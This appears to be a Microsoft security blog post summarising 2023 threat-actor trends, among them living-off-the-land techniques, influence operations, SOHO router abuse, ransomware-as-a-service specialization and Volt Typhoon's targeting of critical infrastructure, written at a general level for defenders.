2023 was a big year for threat intelligence. The sheer volume of threats and attacks revealed through Microsoft’s analysis of 78 trillion daily security signals indicates a shift in how threat actors are scaling and leveraging nation-state support. We saw more attacks than ever before, with attack chains growing increasingly complex; dwell times becoming shorter; and tactics, techniques, and procedures (TTPs) evolving to become nimbler and more evasive.
By looking back at the details of key security incidents in 2023, we can begin to isolate patterns and identify learnings for how we should respond to new threats. Informed by TTP trends across the globe in 2023, here are some of the highlights you should be aware of and monitor in 2024.
- Achieving stealth by avoiding custom tools and malware: One of the core trends identified in 2023 is that threat actors are beginning to selectively avoid the use of custom malware. Instead, they may attempt to slip under the radar and go undetected by using tools and processes that already exist on their victim’s devices. This allows adversaries to obscure themselves alongside other threat actors using similar methods to launch attacks.
An example of this trend can be seen with Volt Typhoon, a Chinese state-sponsored actor that made headlines for targeting US critical infrastructure with living-off-the-land techniques.
- Combining cyber and influence operations for greater impact: Last summer, Microsoft observed certain nation-state actors combining cyber operations and influence operations (IO) methods into a new hybrid known as “cyber-enabled influence operations.” Threat actors commonly use cyber-enabled influence operations to boost, exaggerate, or compensate for shortcomings in their network access or cyberattack capabilities.
For example, Microsoft has observed multiple Iranian actors attempting to use bulk SMS messaging to enhance the amplification and psychological effects of their cyber-influence operations. We’re also seeing more cyber-enabled influence operations attempt to impersonate purported victim organizations, or leading figures in those organizations, to add credibility to the effects of the cyberattack or compromise.
- Creating covert networks by targeting small office/home office network edge devices: Another key trend is the abuse of small office/home office (SOHO) network edge devices. Threat actors are assembling covert networks from these devices, such as the router in your local dentist’s office or your favorite coffee shop. Some adversaries will even use programs to assist with locating vulnerable endpoints around the world to identify the jumping-off point for their next attack. This technique complicates attribution, making attacks appear from virtually anywhere.
- Leveraging social media operations to increase audience engagement: Covert influence operations have now begun to successfully engage with target audiences on social media to a greater extent than previously observed, representing higher levels of sophistication and cultivation of online IO assets.
For example, Microsoft and industry partners observed Chinese-affiliated social media accounts impersonating US voters ahead of the 2022 US midterm elections, posing as Americans across the political spectrum and responding to comments from authentic users.
- Prioritizing specialization within the ransomware economy: Ransomware operators in 2023 trended toward specialization, choosing to focus on a small range of capabilities and services. This specialization has a splintering effect, spreading components of a ransomware attack across multiple providers in a complex underground economy. No longer can companies just think of ransomware attacks as coming from an individual threat actor or group. Instead, they may be combatting the entire ransomware-as-a-service (RaaS) economy. In response, Microsoft Threat Intelligence now tracks ransomware providers individually, noting which groups traffic in initial access and which offer other services.
- Targeting infrastructure for maximum disruption: Finally, we’re seeing some threat actors target other outcomes beyond simple data acquisition. Instead, some are focusing on infrastructure organizations like water treatment facilities, maritime operations, transportation organizations, and more for their disruption value. This trend can be seen in Volt Typhoon’s attacks against critical infrastructure organizations in Guam and elsewhere in the United States.
Rather than leveraging these attacks to obtain valuable or sensitive data, we believe Volt Typhoon may be trying to develop capabilities that could disrupt critical communications infrastructure between the United States and Asia region during future crises.
As we move forward into 2024, it’s important to continually look back on the trends and significant breaches from years past. By analyzing these incidents and the threat actors behind them, we can better understand different adversaries’ personas and predict their next move. To learn more about the latest threat intelligence news and information, visit Microsoft Security Insider and check out The Microsoft Threat Intelligence Podcast.